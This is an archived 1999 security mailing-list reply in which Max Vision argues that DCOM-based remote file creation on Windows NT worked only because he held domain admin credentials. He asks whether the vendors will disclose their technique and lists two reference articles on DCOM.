Re: FW: DCOM attack against NT using VB6

From: Max Vision (visionat_private)
Date: Thu Aug 19 1999 - 17:39:02 PDT

    Hi,

    Did you have credentials to authenticate to your coworker's machines?  I
    was able to create arbitrary files remotely on other NT machines in my
    network using DCOM/Word/Create, but soon discovered that this was because
    I had domain admin credentials that were valid for each host.  IE, DCOM
    attacks aren't effective if you don't have authentication credentials.

    If you have contrary information please let us know :)  I could be
    mistaken, since ISS does a test for non-admin access to DCOM..  What are
    the chances ISS/NAI want to give full disclosure on their DCOM compromise
    technique?

    Required reading:

     Understanding the DCOM Wire Protocol by Analyzing Network Data Packets
     http://www.guyeddon.com/MSJ3-98.htm

     Using Distributed COM with Firewalls
     http://www.iapetus.com/dcom/dcomfw.htm

    Max Vision